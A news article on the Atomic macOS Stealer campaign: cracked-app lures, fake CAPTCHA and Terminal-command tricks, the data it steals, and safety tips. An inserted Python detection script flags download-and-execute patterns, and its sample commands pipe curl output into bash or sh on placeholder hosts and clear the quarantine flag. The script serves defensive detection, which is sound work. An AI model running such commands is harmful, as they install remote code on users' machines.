Hackers Targeting MacBooks with Atomic macOS Stealer Malware Through Fake Apps

 

Hackers are once again setting their sights on MacBooks and other Apple computers, deploying sophisticated malware capable of stealing passwords, files, browser data, and much more.

According to Infosecurity Magazine, cybersecurity firm Trend Micro has identified a new Atomic macOS Stealer campaign. Attackers are spreading malware by tricking users into downloading pirated or “cracked” versions of popular macOS applications. In cases where this fails, cybercriminals rely on fake CAPTCHA prompts to compromise unsuspecting victims.

While many assume Macs are safer than Windows laptops, the reality is different. Apple devices are now prime targets, as hackers see premium Mac users as lucrative victims.

Trend Micro’s report explains that the attack begins when a user downloads what appears to be a cracked app. Once installed, this Trojanized software secretly delivers the Atomic macOS Stealer onto the system.

Cybercriminals distribute these fake apps through forums, malicious ads, or even social media messages. Victims are typically redirected to fraudulent websites with buttons like “Download for macOS.”

In one case, users who attempted to download a cracked version of CleanMyMac ended up installing the Atomic macOS Stealer. Although the site looked legitimate at first, clicking “Download Now” redirected them to a hacker-controlled landing page.

In other scenarios, victims are asked to run commands in Apple Terminal, triggering a malicious installation script. This script creates a binary file, enabling persistence and data theft on the infected Mac.
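A defender-side check for the paste-into-Terminal step described above, as an added example that is not from the article or from Trend Micro's report: it flags command lines that fetch remote content and execute it straight away. The rule patterns and sample commands are constructed assumptions (generic shapes on placeholder `example.invalid` hosts), not indicators from this campaign.

```python
import re

# Assumption: generic download-and-execute shapes, not indicators from the
# Trend Micro report. Legitimate installers can match; a hit means "review".
FETCH = r"\b(?:curl|wget)\b"
INTERP = r"(?:sudo\s+)?(?:/\S*/)?\b(?:sh|bash|zsh|osascript|python3?|perl)\b"

RULES = [
    # Remote content streamed straight into an interpreter.
    ("fetch-piped-to-interpreter",
     re.compile(FETCH + r"[^|;&]*\|\s*" + INTERP)),
    # Interpreter asked to run the output of a fetch: sh -c "$(curl ...)".
    ("interpreter-runs-fetched-output",
     re.compile(INTERP + r"\s+(?:-\w+\s+)*[\"']?\$\(\s*" + FETCH)),
    # Encoded text decoded and executed, which hides the real command.
    ("decoded-blob-piped-to-interpreter",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*" + INTERP)),
    # Quarantine flag cleared, so Gatekeeper's first-launch check is skipped.
    ("quarantine-flag-removed",
     re.compile(r"\bxattr\s+-(?:\w*d\w*\s+com\.apple\.quarantine|\w*c\w*)\b")),
    # File fetched, then marked executable: a dropped binary.
    ("fetched-file-made-executable",
     re.compile(FETCH + r".*\bchmod\s+\S*(?:\+x|7[0-7]{2})\b")),
]

def review_command(command):
    """Return the name of every rule the command line matches."""
    return [name for name, pattern in RULES if pattern.search(command)]

# Constructed sample command lines (placeholder hosts and paths).
SAMPLES = [
    "curl -fsSL https://downloads.example.invalid/install.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://cdn.example.invalid/verify)"',
    "echo Y29uc3RydWN0ZWQ= | base64 -d | sh",
    "xattr -cr /Applications/Cleaner.app",
    "curl -o /tmp/update https://files.example.invalid/update"
    " && chmod +x /tmp/update && /tmp/update",
    # Benign: the download is only hashed, never executed.
    "curl -fsSL https://example.invalid/tool.dmg | shasum -a 256",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(review_command(line) or ["no-match"], line)
```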

Once installed, the malware collects and transmits sensitive information to a hacker-controlled server, including:
  • System profile details
  • Usernames and passwords
  • Browser data (cookies, web history, login credentials)
  • Cryptocurrency wallet info
  • Telegram data
  • OpenVPN profiles
  • Keychain and Apple Notes data
  • Files from local folders
This stolen data can be exploited directly in future attacks or sold on the dark web to other cybercriminals.

How to Stay Safe

To reduce risk, experts stress the importance of downloading apps only from the Apple App Store or directly from trusted developer websites. Be cautious of URLs with typos, poor grammar, or suspicious ads at the top of search results.

Avoid cracked or pirated apps altogether—beyond harming developers, they often serve as malware carriers. Even if the app functions, hidden malicious code may still steal your data or compromise your system.

Although macOS includes Gatekeeper and XProtect for built-in protection, using reputable third-party Mac antivirus software is strongly recommended. Many premium antivirus tools also include VPNs and password managers for added security.

Despite the outdated belief that “Macs don’t get viruses,” hackers continue to exploit complacency. Staying vigilant online—especially when downloading apps—is the best defense.